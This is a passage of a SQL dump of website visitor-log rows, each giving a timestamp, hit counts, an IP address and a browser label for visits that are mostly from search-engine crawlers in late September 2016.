0,0,'141.8.142.67','other'),(64323,1474882639,1,1,0,0,'51.255.51.70','other'),(64324,1474882743,2,2,0,0,'130.193.50.34','other'),(64325,1474882954,1,1,0,0,'130.193.51.19','other'),(64326,1474883117,1,1,0,0,'178.154.149.11','other'),(64327,1474883187,1,1,0,0,'5.255.253.53','other'),(64328,1474883261,1,1,0,0,'141.8.183.14','other'),(64329,1474883303,1,1,0,0,'141.8.142.85','other'),(64330,1474884046,1,1,0,0,'94.179.115.131','chrome'),(64331,1474884758,1,1,0,0,'207.46.13.63','other'),(64332,1474884802,1,1,0,0,'66.102.9.27','other'),(64333,1474886534,1,1,0,0,'91.196.178.71','firefox'),(64334,1474888208,1,1,0,0,'66.102.9.29','other'),(64335,1474888238,1,1,0,0,'91.196.178.132','firefox'),(64336,1474888256,1,1,0,0,'207.46.13.63','other'),(64337,1474888698,1,1,0,0,'91.196.178.71','firefox'),(64338,1474888843,1,0,1,0,'66.249.76.47',''),(64339,1474888917,1,0,1,0,'66.249.66.81',''),(64340,1474889862,2,2,0,0,'94.178.146.153','chrome'),(64341,1474890082,1,1,0,0,'91.196.122.186','chrome'),(64342,1474890349,209,209,0,0,'144.76.12.78','other'),(64343,1474890364,2,0,2,0,'68.180.229.34',''),(64344,1474890404,1,0,1,0,'66.249.76.47',''),(64345,1474890699,1,0,1,0,'66.249.66.84',''),(64346,1474890961,1,1,0,0,'66.102.9.29','chrome'),(64347,1474891071,1,1,0,0,'176.195.103.190','other'),(64348,1474891283,1,0,1,0,'68.180.229.34',''),(64349,1474891478,1,0,1,0,'66.249.76.45',''),(64350,1474891504,1,1,0,0,'66.102.9.29','other'),(64351,1474891646,1,0,1,0,'66.249.76.47',''),(64352,1474892002,1,1,0,0,'91.196.178.71','firefox'),(64353,1474892071,1,1,0,0,'31.13.102.127','other'),(64354,1474892081,1,1,0,0,'66.249.93.14','chrome'),(64355,1474892202,1,1,0,0,'31.13.100.114','other'),(64357,1474892229,1,1,0,0,'91.196.178.72','chrome'),(64358,1474892481,1,1,0,0,'141.8.183.14','other'),(64359,1474892776,1,1,0,0,'66.249.93.15','chrome'),(64360,1474892850,3,3,0,0,'5.255.253.36','other'),(64361,1474892854,1,1,0,0,'66.249.93.13','chrome'),(64362,1474892928,1,1,0,0,'176.14.238.113','msie'),(64363,1474892956,1,1,0,0,'109.63.141.131','msie'),(64364,1474893100,1,1,0,0,'5.255.253.47','other'),(64365,1474893169,1,1,0,0,'141.8.142.78','other'),(64366,1474893242,1,1,0,0,'141.8.142.25','other'),(64367,1474893270,1,1,0,0,'130.193.37.7','other'),(64368,1474893301,1,1,0,0,'141.8.142.85','other'),(64369,1474893333,1,1,0,0,'5.255.253.10','other'),(64370,1474893414,1,1,0,0,'141.8.183.25','other'),(64371,1474893418,1,1,0,0,'178.154.189.31','other'),(64372,1474893464,1,1,0,0,'91.124.182.3','firefox'),(64373,1474893741,1,1,0,0,'91.196.178.72','firefox'),(64374,1474894007,1,1,0,0,'62.80.165.2','firefox'),(64375,1474894050,1,1,0,0,'37.54.17.67','chrome'),(64376,1474894176,4,4,0,0,'92.238.226.245','other'),(64377,1474895146,1,1,0,0,'66.102.9.25','other'),(64378,1474895723,1,1,0,0,'141.8.132.52','other'),(64379,1474896847,1,1,0,0,'51.255.65.27','other'),(64380,1474897215,1,1,0,0,'51.255.65.85','other'),(64381,1474897249,1,1,0,0,'207.46.13.63','other'),(64382,1474897456,1,1,0,0,'51.255.65.82','other'),(64383,1474897620,1,1,0,0,'180.76.15.17','other'),(64384,1474897922,1,1,0,0,'46.188.42.138','msie'),(64385,1474898162,1,1,0,0,'46.200.33.76','chrome'),(64386,1474898170,1,1,0,0,'163.172.65.115','other'),(64387,1474898248,1,1,0,0,'51.255.48.154','other'),(64388,1474898288,1,1,0,0,'163.172.66.102','other'),(64389,1474898419,1,1,0,0,'141.8.132.52','other'),(64390,1474898424,1,1,0,0,'180.76.15.32','other'),(64391,1474898483,1,1,0,0,'91.196.178.71','chrome'),(64392,1474898710,1,1,0,0,'207.46.13.63','other'),(64393,1474898716,1,1,0,0,'66.102.9.29','other'),(64394,1474898833,1,1,0,0,'157.55.39.68','other'),(64395,1474899229,1,0,1,0,'66.249.76.45',''),(64396,1474900150,1,1,0,0,'164.132.161.38','other'),(64397,1474900624,1,1,0,0,'178.94.8.20','chrome'),(64398,1474901154,1,0,1,0,'66.249.76.47',''),(64399,1474901327,1,1,0,0,'207.46.13.115','other'),(64400,1474901385,1,1,0,0,'141.8.142.10','other'),(64401,1474901389,1,1,0,0,'141.8.183.19','other'),(64402,1474901467,1,1,0,0,'94.178.202.64','chrome'),(64403,1474901700,1,1,0,0,'178.154.149.11','other'),(64404,1474901792,1,1,0,0,'5.255.250.41','other'),(64405,1474901941,1,1,0,0,'5.255.253.9','other'),(64406,1474902128,1,1,0,0,'141.8.132.52','other'),(64407,1474902205,1,1,0,0,'141.8.142.67','other'),(64408,1474902285,1,1,0,0,'130.193.50.34','other'),(64409,1474902333,1,1,0,0,'5.255.253.67','other'),(64410,1474902354,1,1,0,0,'5.255.253.47','other'),(64411,1474902387,1,1,0,0,'130.193.51.43','other'),(64412,1474902412,1,1,0,0,'141.8.183.25','other'),(64413,1474902514,1,1,0,0,'66.102.9.29','other'),(64414,1474902658,1,1,0,0,'163.172.65.49','other'),(64415,1474902838,1,1,0,0,'88.252.198.213','other'),(64416,1474903040,1,1,0,0,'141.0.12.26','other'),(64417,1474903437,1,1,0,0,'163.172.66.77','other'),(64418,1474905065,1,1,0,0,'164.132.161.53','other'),(64419,1474905596,1,1,0,0,'51.255.65.10','other'),(64420,1474906001,1,1,0,0,'66.102.9.25','other'),(64421,1474907065,1,1,0,0,'51.255.65.94','other'),(64422,1474907591,1,1,0,0,'51.255.65.41','other'),(64423,1474907710,1,1,0,0,'157.55.39.68','other'),(64424,1474907759,1,1,0,0,'51.255.65.84','other'),(64425,1474908177,1,1,0,0,'163.172.65.239','other'),(64426,1474908229,1,1,0,0,'91.196.178.65','chrome'),(64427,1474908537,1,0,1,0,'66.249.76.45',''),(64428,1474909452,1,1,0,0,'93.80.145.198','msie'),(64429,1474909505,1,1,0,0,'66.102.9.25','other'),(64430,1474909649,1,1,0,0,'91.196.178.71','firefox'),(64431,1474909774,1,1,0,0,'51.255.65.63','other'),(64432,1474910430,1,1,0,0,'164.132.161.43','other'),(64433,1474910796,1,1,0,0,'164.132.161.78','other'),(64434,1474910811,1,1,0,0,'95.134.11.136','chrome'),(64435,1474911031,1,1,0,0,'141.0.12.225','other'),(64436,1474911305,1,1,0,0,'51.255.65.59','other'),(64437,1474911389,1,1,0,0,'163.172.65.210','other'),(64438,1474911474,1,1,0,0,'46.4.116.197','other'),(64439,1474912048,1,1,0,0,'207.46.13.63','other'),(64440,1474912562,1,1,0,0,'51.255.65.66','other'),(64441,1474912826,1,1,0,0,'109.173.57.240','msie'),(64442,1474912948,1,0,1,0,'66.249.76.89',''),(64443,1474913104,1,1,0,0,'91.196.178.168','other'),(64444,1474913115,1,1,0,0,'109.63.217.159','msie'),(64445,1474913241,1,1,0,0,'66.102.9.29','other'),(64446,1474913616,1,1,0,0,'94.179.125.185','chrome'),(64447,1474913948,1,1,0,0,'163.172.66.64','other'),(64448,1474914643,1,1,0,0,'163.172.66.181','other'),(64449,1474915740,1,1,0,0,'163.172.65.63','other'),(64450,1474916654,2,2,0,0,'46.4.120.3','other'),(64451,1474916707,1,1,0,0,'66.102.9.29','other'),(64452,1474917656,1,1,0,0,'163.172.65.34','other'),(64453,1474917935,1,1,0,0,'164.132.161.52','other'),(64454,1474918021,1,1,0,0,'164.132.161.43','other'),(64455,1474918128,1,1,0,0,'174.129.237.157','other'),(64456,1474918893,1,1,0,0,'91.196.178.168','other'),(64457,1474919314,1,1,0,0,'164.132.161.97','other'),(64458,1474919506,1,1,0,0,'163.172.65.217','other'),(64459,1474920059,1,1,0,0,'163.172.66.19','other'),(64460,1474920310,1,1,0,0,'66.102.9.25','other'),(64461,1474920496,1,1,0,0,'207.46.13.115','other'),(64462,1474920929,2,2,0,0,'174.129.237.157','other'),(64463,1474921429,1,1,0,0,'163.172.66.21','other'),(64464,1474921694,2,2,0,0,'130.193.50.34','other'),(64465,1474922223,1,1,0,0,'141.8.142.58','other'),(64466,1474922300,1,1,0,0,'130.193.51.19','other'),(64467,1474922372,1,1,0,0,'141.8.183.25','other'),(64468,1474922576,1,1,0,0,'8.37.232.79','other'),(64469,1474923136,1,1,0,0,'51.255.65.66','other'),(64470,1474923727,7,7,0,0,'185.89.101.225','chrome'),(64471,1474923904,1,1,0,0,'66.102.9.25','other'),(64472,1474927504,1,1,0,0,'66.102.9.29','other'),(64473,1474927982,1,1,0,0,'157.55.39.68','other'),(64474,1474929044,1,1,0,0,'174.129.237.157','other'),(64475,1474929388,1,0,1,0,'66.249.76.91',''),(64476,1474929401,1,0,1,0,'66.249.66.84',''),(64477,1474929405,1,0,1,0,'66.249.76.87',''),(64478,1474929415,1,0,1,0,'66.249.66.81',''),(64479,1474931069,1,0,1,0,'66.249.66.81',''),(64480,1474931104,1,1,0,0,'66.102.9.27','other'),(64481,1474933601,1,1,0,0,'5.32.182.169','other'),(64482,1474933632,1,1,0,0,'163.172.65.203','other'),(64483,1474934273,1,1,0,0,'163.172.65.118','other'),(64484,1474934346,1,1,0,0,'157.55.39.68','other'),(64485,1474934556,1,1,0,0,'207.46.13.63','other'),(64486,1474934705,1,1,0,0,'66.102.9.29','other'),(64487,1474935869,1,0,1,0,'68.180.229.34',''),(64488,1474937193,1,1,0,0,'51.255.65.19','other'),(64489,1474937647,1,1,0,0,'163.172.64.220','other'),(64490,1474938304,1,1,0,0,'66.102.9.25','other'),(64491,1474938818,1,1,0,0,'163.172.64.193','other'),(64492,1474939867,1,1,0,0,'51.255.65.8','other'),(64493,1474939969,1,1,0,0,'157.55.39.68','other'),(64494,1474940443,1,1,0,0,'51.255.65.17','other'),(64495,1474941033,1,1,0,0,'164.132.161.40','other'),(64496,1474941904,1,1,0,0,'66.102.9.27','other'),(64497,1474942785,1,1,0,0,'163.172.64.223','other'),(64498,1474943084,1,1,0,0,'164.132.161.15','other'),(64499,1474943265,1,1,0,0,'51.255.65.56','other'),(64500,1474943387,1,1,0,0,'66.102.9.29','chrome'),(64501,1474943930,1,1,0,0,'164.132.161.24','other'),(64502,1474944602,1,1,0,0,'163.172.64.222','other'),(64503,1474944621,1,1,0,0,'51.255.65.73','other'),(64504,1474944728,1,1,0,0,'51.255.65.87','other'),(64505,1474945131,1,1,0,0,'163.172.64.247','other'),(64506,1474945643,1,1,0,0,'66.102.9.25','other'),(64507,1474945954,1,1,0,0,'51.255.65.87','other'),(64508,1474946108,1,1,0,0,'207.46.13.165','other'),(64509,1474946134,1,1,0,0,'180.76.15.139','other'),(64510,1474948583,1,1,0,0,'163.172.66.34','other'),(64511,1474948594,1,0,1,0,'66.249.66.180',''),(64512,1474948798,1,1,0,0,'163.172.65.31','other'),(64513,1474949285,1,1,0,0,'164.132.161.50','other'),(64514,1474949578,1,1,0,0,'163.172.66.110','other'),(64515,1474949770,1,1,0,0,'194.187.170.122','other'),(64516,1474950564,1,1,0,0,'107.167.110.12','other'),(64517,1474950693,1,1,0,0,'91.196.178.168','other'),(64518,1474950926,1,1,0,0,'66.249.66.87','chrome'),(64519,1474951030,1,1,0,0,'163.172.65.64','other'),(64520,1474951918,1,0,1,0,'66.249.76.45',''),(64521,1474952128,1,1,0,0,'207.46.13.63','other'),(64522,1474954224,1,1,0,0,'91.196.178.71','firefox'),(64523,1474954291,1,1,0,0,'51.255.65.53','other'),(64524,1474954339,1,1,0,0,'180.76.15.27','other'),(64525,1474954766,1,1,0,0,'66.249.93.15','chrome'),(64526,1474954932,1,1,0,0,'163.172.64.178','other'),(64527,1474955173,1,0,1,0,'66.249.66.87',''),(64528,1474955221,1,1,0,0,'51.255.65.53','other'),(64529,1474955359,1,1,0,0,'94.179.107.213','chrome'),(64530,1474955752,1,1,0,0,'91.196.178.36','chrome'),(64531,1474956449,1,0,1,0,'66.249.66.84',''),(64532,1474956608,1,1,0,0,'91.196.178.68','chrome'),(64533,1474957057,1,1,0,0,'94.179.10.4','chrome'),(64534,1474957354,1,1,0,0,'91.196.178.71','firefox'),(64535,1474957599,1,1,0,0,'164.132.161.59','other'),(64536,1474957882,1,1,0,0,'51.255.65.38','other'),(64537,1474958123,1,1,0,0,'51.255.65.81','other'),(64538,1474958663,1,1,0,0,'176.14.37.75','msie'),(64539,1474958725,1,1,0,0,'163.172.65.2','other'),(64540,1474958803,1,1,0,0,'91.196.178.68','firefox'),(64541,1474959474,1,1,0,0,'93.73.234.193','firefox'),(64542,1474959638,1,1,0,0,'164.132.161.59','other'),(64543,1474960224,1,1,0,0,'51.255.65.13','other'),(64544,1474961070,1,1,0,0,'91.196.178.71','chrome'),(64545,1474961274,1,1,0,0,'51.255.65.95','other'),(64546,1474961377,1,1,0,0,'157.55.39.27','other'),(64547,1474961721,1,1,0,0,'94.179.32.78','firefox'),(64548,1474962099,1,1,0,0,'163.172.66.127','other'),(64549,1474962510,1,1,0,0,'91.196.178.71','chrome'),(64550,1474962794,1,1,0,0,'51.255.65.51','other'),(64551,1474963331,1,1,0,0,'37.52.162.4','opera'),(64552,1474963553,2,1,1,0,'66.249.76.47',''),(64553,1474963992,1,1,0,0,'163.172.65.57','other'),(64554,1474964367,1,1,0,0,'164.132.161.29','other'),(64555,1474964706,1,1,0,0,'164.132.161.97','other'),(64556,1474964862,1,1,0,0,'51.255.65.27','other'),(64557,1474965041,1,1,0,0,'51.255.65.90','other'),(64558,1474965618,1,1,0,0,'163.172.66.158','other'),(64559,1474965661,1,1,0,0,'94.179.4.65','chrome'),(64560,1474965730,1,0,1,0,'66.249.76.45',''),(64561,1474966194,1,1,0,0,'51.255.65.53','other'),(64562,1474966787,1,0,1,0,'66.249.66.183',''),(64563,1474966835,1,0,1,0,'66.249.76.46',''),(64564,1474967478,1,1,0,0,'195.162.90.59','chrome'),(64565,1474969263,1,1,0,0,'66.249.76.46','chrome'),(64566,1474969360,1,1,0,0,'66.249.69.79','chrome'),(64567,1474970524,1,1,0,0,'91.196.178.130','firefox'),(64568,1474970760,1,1,0,0,'51.255.65.70','other'),(64569,1474970915,1,1,0,0,'164.132.161.8','other'),(64570,1474970972,1,1,0,0,'180.76.15.6','other'),(64571,1474971240,1,0,1,0,'66.249.76.47',''),(64572,1474971260,1,1,0,0,'51.255.65.31','other'),(64573,1474971268,1,1,0,0,'51.255.65.16','other'),(64574,1474971359,1,1,0,0,'51.255.65.4','other'),(64575,1474971483,1,1,0,0,'163.172.65.199','other'),(64576,1474971551,1,1,0,0,'51.255.65.85','other'),(64577,1474971696,1,1,0,0,'164.132.161.75','other'),(64578,1474971944,1,1,0,0,'51.255.65.26','other'),(64579,1474972020,1,1,0,0,'163.172.65.218','other'),(64580,1474972652,1,1,0,0,'207.46.13.63','other'),(64581,1474972788,1,1,0,0,'164.132.161.89','other'),(64582,1474973338,1,1,0,0,'164.132.161.46','other'),(64583,1474974235,1,1,0,0,'51.255.65.21','other'),(64584,1474974255,1,1,0,0,'163.172.66.67','other'),(64585,1474974559,1,1,0,0,'164.132.161.3','other'),(64586,1474975177,1,1,0,0,'91.196.178.68','firefox'),(64587,1474975249,1,1,0,0,'91.196.178.68','chrome'),(64588,1474975410,1,1,0,0,'51.255.65.3','other'),(64589,1474976400,1,0,1,0,'66.249.66.87',''),(64590,1474976718,1,0,1,0,'66.249.76.46',''),(64591,1474976731,1,1,0,0,'204.79.180.148','msie'),(64592,1474977302,1,1,0,0,'46.242.121.64','chrome'),(64593,1474977326,1,1,0,0,'91.196.178.67','firefox'),(64594,1474977941,1,1,0,0,'31.41.94.50','chrome'),(64595,1474978092,1,1,0,0,'91.196.178.36','chrome'),(64596,1474978903,1,1,0,0,'164.132.161.23','other'),(64597,1474979777,1,1,0,0,'51.255.65.7','other'),(64598,1474980104,1,1,0,0,'194.44.198.39','firefox'),(64599,1474980397,1,0,1,0,'66.249.76.46',''),(64600,1474980466,1,1,0,0,'51.255.65.31','other'),(64601,1474980794,1,1,0,0,'94.179.205.70','chrome'),(64602,1474980808,1,1,0,0,'91.196.178.71','firefox'),(64603,1474981738,1,1,0,0,'5.228.35.210','chrome'),(64604,1474981872,1,1,0,0,'40.77.167.5','other'),(64605,1474982048,1,1,0,0,'91.196.178.68','chrome'),(64606,1474982167,1,1,0,0,'163.172.65.62','other'),(64607,1474982776,1,1,0,0,'51.255.65.31','other'),(64608,1474984484,1,1,0,0,'66.249.66.87','chrome'),(64609,1474984727,1,1,0,0,'66.249.66.84','chrome'),(64610,1474985078,1,1,0,0,'91.196.178.68','firefox'),(64611,1474985613,1,1,0,0,'178.94.34.220','firefox'),(64612,1474986269,1,1,0,0,'66.249.76.47','chrome'),(64613,1474986307,7,7,0,0,'141.8.183.25','other'),(64614,1474986353,3,3,0,0,'130.193.51.19','other'),(64615,1474986543,1,1,0,0,'40.77.167.5','other'),(64616,1474986607,3,3,0,0,'130.193.50.34','other'),(64617,1474986838,1,1,0,0,'213.227.195.79','chrome'),(64618,1474987925,1,0,1,0,'66.249.76.47',''),(64619,1474988046,1,1,0,0,'5.228.38.68','msie'),(64620,1474988343,1,1,0,0,'163.172.64.240','other'),(64621,1474988355,1,1,0,0,'130.193.50.34','other'),(64622,1474988368,1,1,0,0,'66.249.76.45','chrome'),(64623,1474988484,1,1,0,0,'180.76.15.25','other'),(64624,1474988568,1,1,0,0,'217.69.133.227','other'),(64625,1474988940,1,1,0,0,'163.172.65.221','other'),(64626,1474989695,1,1,0,0,'176.195.104.18','msie'),(64627,1474990115,1,1,0,0,'163.172.66.42','other'),(64628,1474990755,1,1,0,0,'163.172.66.77','other'),(64629,1474991290,1,1,0,0,'66.249.76.47','chrome'),(64630,1474992157,1,1,0,0,'91.196.178.163','firefox'),(64631,1474992216,1,0,1,0,'66.249.76.79',''),(64632,1474992667,1,1,0,0,'178.255.215.94','other'),(64633,1474993090,1,1,0,0,'163.172.65.196','other'),(64634,1474993478,1,1,0,0,'91.196.178.71','chrome'),(64635,1474993779,1,1,0,0,'163.172.65.17','other'),(64636,1474994049,1,1,0,0,'66.249.76.47','chrome'),(64637,1474994146,1,1,0,0,'46.73.157.91','msie'),(64638,1474994914,1,1,0,0,'157.55.39.27','other'),(64639,1474995660,1,1,0,0,'109.173.49.197','msie'),(64640,1474996731,1,0,1,0,'66.249.76.81',''),(64641,1474996857,1,1,0,0,'93.78.183.138','chrome'),(64642,1474997474,1,1,0,0,'163.172.65.34','other'),(64643,1474997814,1,1,0,0,'93.80.145.197','other'),(64644,1474998069,262,262,0,0,'51.254.121.186','other'),(64645,1474998073,1,1,0,0,'51.255.65.71','other'),(64646,1474998574,1,1,0,0,'163.172.65.196','other'),(64647,1474999987,1,0,1,0,'66.249.76.45',''),(64648,1475000075,1,1,0,0,'157.55.39.147','other'),(64649,1475000197,1,1,0,0,'46.200.73.70','other'),(64650,1475000223,1,0,1,0,'66.249.76.47',''),(64651,1475001262,1,1,0,0,'207.46.13.63','other'),(64652,1475001367,1,1,0,0,'51.255.65.52','other'),(64653,1475001993,1,0,1,0,'66.249.66.81',''),(64654,1475003051,1,1,0,0,'163.172.65.201','other'),(64655,1475003879,1,1,0,0,'51.255.65.89','other'),(64656,1475003932,1,1,0,0,'128.72.212.252','msie'),(64657,1475004075,1,1,0,0,'207.46.13.63','other'),(64658,1475004655,1,1,0,0,'54.212.140.32','chrome'),(64659,1475006707,1,1,0,0,'66.102.9.27','other'),(64660,1475006889,1,0,1,0,'66.249.76.46',''),(64661,1475007632,1,1,0,0,'180.76.15.8','other'),(64662,1475008290,1,0,1,0,'66.249.76.47',''),(64663,1475010601,1,1,0,0,'66.102.9.29','other'),(64664,1475011312,1,1,0,0,'51.255.65.13','other'),(64665,1475011552,5,5,0,0,'62.210.143.245','other'),(64666,1475011892,1,1,0,0,'164.132.161.27','other'),(64667,1475012459,1,0,1,0,'66.249.66.87',''),(64668,1475013318,1,1,0,0,'164.132.161.59','other'),(64669,1475013399,1,1,0,0,'163.172.64.220','other'),(64670,1475013903,1,1,0,0,'66.102.9.27','other'),(64671,1475015738,1,0,1,0,'66.249.76.46',''),(64672,1475016987,1,1,0,0,'164.132.161.77','other'),(64673,1475017891,1,1,0,0,'66.102.9.25','other'),(64674,1475018112,1,1,0,0,'207.46.13.63','other'),(64675,1475019599,1,1,0,0,'164.132.161.86','other'),(64676,1475020410,1,1,0,0,'164.132.161.70','other'),(64677,1475020687,1,1,0,0,'130.193.50.34','other'),(64678,1475021393,2,2,0,0,'51.255.162.164','other'),(64679,1475021435,1,1,0,0,'66.102.9.29','other'),(64680,1475021466,2,0,2,0,'68.180.229.34',''),(64681,1475021591,1,1,0,0,'164.132.161.12','other'),(64682,1475021987,1,1,0,0,'164.132.161.39','other'),(64683,1475022588,1,0,1,0,'68.180.229.190',''),(64684,1475023673,1,1,0,0,'164.132.161.74','other'),(64685,1475024199,1,1,0,0,'51.255.65.88','other'),(64686,1475024343,1,1,0,0,'51.255.65.61','other'),(64687,1475025040,1,1,0,0,'66.102.9.25','other'),(64688,1475025502,1,1,0,0,'163.172.66.13','other'),(64689,1475025790,1,1,0,0,'163.172.65.243','other'),(64690,1475025943,1,1,0,0,'164.132.161.18','other'),(64691,1475026770,1,1,0,0,'164.132.161.38','other'),(64692,1475027011,1,1,0,0,'163.172.66.71','other'),(64693,1475028628,1,1,0,0,'51.255.65.44','other'),(64694,1475028764,1,1,0,0,'66.102.9.29','other'),(64695,1475030222,1,1,0,0,'163.172.65.192','other'),(64696,1475030327,1,1,0,0,'164.132.161.12','other'),(64697,1475031904,1,1,0,0,'66.102.9.27','other'),(64698,1475034285,1,1,0,0,'51.255.65.94','other'),(64699,1475034596,1,1,0,0,'51.255.65.25','other'),(64700,1475036041,1,1,0,0,'66.102.9.27','other'),(64701,1475036810,1,1,0,0,'163.172.65.111','other'),(64702,1475037251,1,1,0,0,'66.102.9.27','chrome'),(64703,1475037935,1,1,0,0,'51.255.65.57','other'),(64704,1475038181,1,1,0,0,'94.179.40.67','chrome'),(64705,1475039251,1,1,0,0,'66.102.9.29','other'),(64706,1475040024,1,1,0,0,'207.46.13.102','other'),(64707,1475040370,1,1,0,0,'91.196.178.68','chrome'),(64708,1475041066,1,1,0,0,'66.249.93.14','chrome'),(64709,1475042085,1,1,0,0,'163.172.64.181','other'),(64710,1475043056,1,1,0,0,'66.102.9.25','other'),(64711,1475043219,1,1,0,0,'207.46.13.123','other'),(64712,1475044069,1,1,0,0,'178.94.22.90','firefox'),(64713,1475044096,1,1,0,0,'95.108.225.218','chrome'),(64714,1475044277,1,1,0,0,'91.196.178.66','firefox'),(64715,1475044838,1,1,0,0,'178.93.2.181','chrome'),(64716,1475045415,1,1,0,0,'91.196.178.70','firefox'),(64717,1475045930,1,1,0,0,'174.129.237.157','other'),(64718,1475046591,1,1,0,0,'94.179.102.245','firefox'),(64719,1475047611,1,0,1,0,'66.249.76.45',''),(64720,1475047619,1,1,0,0,'178.94.22.90','firefox'),(64721,1475047836,1,1,0,0,'95.134.35.13','opera'),(64722,1475048755,1,1,0,0,'207.46.13.123','other'),(64723,1475048764,1,1,0,0,'178.94.22.90','firefox'),(64724,1475049324,1,1,0,0,'91.196.178.70','chrome'),(64725,1475051330,1,1,0,0,'94.179.102.245','firefox'),(64726,1475051614,1,1,0,0,'94.179.56.127','chrome'),(64727,1475051777,1,1,0,0,'130.193.51.19','other'),(64728,1475051793,1,1,0,0,'5.9.8.150','other'),(64729,1475051875,1,1,0,0,'141.8.132.52','other'),(64730,1475052169,1,1,0,0,'51.255.65.5','other'),(64731,1475052451,1,1,0,0,'141.8.142.67','other'),(64732,1475053668,1,1,0,0,'178.93.2.181','chrome'),(64733,1475054316,1,1,0,0,'91.196.178.68','chrome'),(64734,1475054525,1,1,0,0,'207.46.13.102','other'),(64735,1475054530,1,1,0,0,'207.46.13.63','other'),(64736,1475055139,1,1,0,0,'164.132.161.25','other'),(64737,1475057064,1,1,0,0,'62.80.165.2','firefox'),(64738,1475057710,1,1,0,0,'157.55.39.147','other'),(64739,1475057916,1,1,0,0,'163.172.66.28','other'),(64740,1475058095,1,1,0,0,'51.255.65.31','other'),(64741,1475059921,1,1,0,0,'157.55.39.147','other'),(64742,1475060491,1,1,0,0,'178.94.22.90','firefox'),(64743,1475060580,1,1,0,0,'94.179.95.34','chrome'),(64744,1475060711,1,1,0,0,'207.46.13.63','other'),(64745,1475061338,1,1,0,0,'91.196.178.66','firefox'),(64746,1475061594,1,0,1,0,'66.249.76.45',''),(64747,1475061668,1,0,1,0,'66.249.76.47',''),(64748,1475061985,1,1,0,0,'180.76.15.152','other'),(64749,1475062843,1,1,0,0,'94.178.199.160','chrome'),(64750,1475063342,1,1,0,0,'164.132.161.44','other'),(64751,1475063593,1,1,0,0,'91.196.178.72','firefox'),(64752,1475064249,1,1,0,0,'163.172.65.192','other'),(64753,1475064396,1,1,0,0,'163.172.65.45','other'),(64754,1475065045,1,1,0,0,'163.172.65.243','other'),(64755,1475065956,1,0,1,0,'66.249.76.45',''),(64756,1475065976,1,1,0,0,'46.219.253.225','chrome'),(64757,1475066299,1,0,1,0,'66.249.66.81',''),(64758,1475066320,1,1,0,0,'164.132.161.79','other'),(64759,1475066351,1,1,0,0,'51.255.65.61','other'),(64760,1475066636,1,1,0,0,'207.46.13.118','other'),(64761,1475069280,1,1,0,0,'207.46.13.118','other'),(64762,1475069579,1,1,0,0,'164.132.161.78','other'),(64763,1475070285,1,0,1,0,'68.180.229.34',''),(64764,1475070351,1,0,1,0,'66.249.76.47',''),(64765,1475071932,1,0,1,0,'66.249.76.47',''),(64766,1475071994,1,0,1,0,'68.180.229.34',''),(64767,1475072261,1,1,0,0,'164.132.161.63','other'),(64768,1475072336,1,1,0,0,'163.172.66.121','other'),(64769,1475072491,1,1,0,0,'37.53.89.22','chrome'),(64770,1475073283,1,0,1,0,'66.249.76.45',''),(64771,1475073411,1,1,0,0,'164.132.161.12','other'),(64772,1475073484,1,1,0,0,'163.172.66.112','other'),(64773,1475073543,1,1,0,0,'66.249.76.45','chrome'),(64774,1475073962,1,1,0,0,'207.46.13.102','other'),(64775,1475074175,1,1,0,0,'51.255.65.92','other'),(64776,1475074952,1,1,0,0,'51.255.65.90','other'),(64777,1475075055,1,0,1,0,'66.249.66.84',''),(64778,1475075726,3,0,3,0,'66.249.76.46',''),(64779,1475076148,2,0,2,0,'66.249.76.45',''),(64780,1475076948,1,1,0,0,'94.179.71.168','chrome'),(64781,1475078227,1,1,0,0,'207.46.13.102','other'),(64782,1475078526,1,1,0,0,'51.255.65.50','other'),(64783,1475078940,1,1,0,0,'159.224.236.229','chrome'),(64784,1475079264,1,1,0,0,'130.193.51.19','other'),(64785,1475079270,2,0,2,0,'66.249.76.45',''),(64786,1475079447,1,1,0,0,'78.111.190.153','chrome'),(64787,1475079592,1,1,0,0,'163.172.65.189','other'),(64788,1475079866,1,1,0,0,'159.224.236.229','chrome'),(64789,1475080550,1,1,0,0,'193.90.12.88','chrome'),(64790,1475080685,1,1,0,0,'51.255.65.53','other'),(64791,1475081280,1,1,0,0,'174.129.237.157','other'),(64792,1475081627,1,1,0,0,'91.196.178.39','chrome'),(64793,1475082399,1,1,0,0,'157.55.39.147','other'),(64794,1475082537,1,0,1,0,'66.249.76.47',''),(64795,1475082595,1,1,0,0,'130.193.50.34','other'),(64796,1475082837,1,1,0,0,'91.196.178.65','chrome'),(64797,1475082940,1,1,0,0,'174.129.237.157','other'),(64798,1475083060,1,0,1,0,'66.249.76.77',''),(64799,1475083807,1,1,0,0,'159.224.236.229','chrome'),(64800,1475083850,1,0,1,0,'66.249.66.84',''),(64801,1475084039,1,0,1,0,'66.249.76.45',''),(64802,1475085421,1,1,0,0,'130.193.50.34','other'),(64803,1475085554,1,1,0,0,'141.8.142.58','other'),(64804,1475085973,1,1,0,0,'207.46.13.63','other'),(64805,1475086528,2,0,2,0,'66.249.76.47',''),(64806,1475086695,1,0,1,0,'66.249.76.81',''),(64807,1475087678,1,0,1,0,'66.249.66.87',''),(64808,1475088139,1,1,0,0,'163.172.66.126','other'),(64809,1475088377,1,0,1,0,'66.249.76.46',''),(64810,1475089686,1,1,0,0,'164.132.161.46','other'),(64811,1475089713,1,1,0,0,'164.132.161.21','other'),(64812,1475089815,1,1,0,0,'66.102.9.29','chrome'),(64813,1475090368,1,1,0,0,'91.196.178.104','chrome'),(64814,1475090565,1,1,0,0,'163.172.65.24','other'),(64815,1475090626,1,1,0,0,'5.45.255.77','chrome'),(64816,1475090801,1,1,0,0,'93.158.152.84','other'),(64817,1475091159,1,1,0,0,'163.172.66.121','other'),(64818,1475091366,1,1,0,0,'130.193.50.34','other'),(64819,1475091622,1,1,0,0,'141.8.142.58','other'),(64820,1475091933,1,1,0,0,'51.255.65.55','other'),(64821,1475092285,1,1,0,0,'163.172.66.136','other'),(64822,1475092404,1,1,0,0,'51.255.65.30','other'),(64823,1475092652,1,1,0,0,'207.46.13.63','other'),(64824,1475093039,1,1,0,0,'164.132.161.11','other'),(64825,1475093131,1,1,0,0,'130.193.50.34','other'),(64826,1475093322,1,1,0,0,'141.8.183.25','other'),(64827,1475093602,1,1,0,0,'66.249.75.179','chrome'),(64828,1475093919,1,1,0,0,'144.76.7.107','other'),(64829,1475093963,1,1,0,0,'164.132.161.23','other'),(64830,1475094136,1,1,0,0,'51.255.65.13','other'),(64831,1475094562,1,1,0,0,'164.132.161.52','other'),(64832,1475095421,1,0,1,0,'66.249.76.47',''),(64833,1475095635,1,1,0,0,'66.249.76.77','chrome'),(64834,1475095908,1,1,0,0,'91.196.178.72','chrome'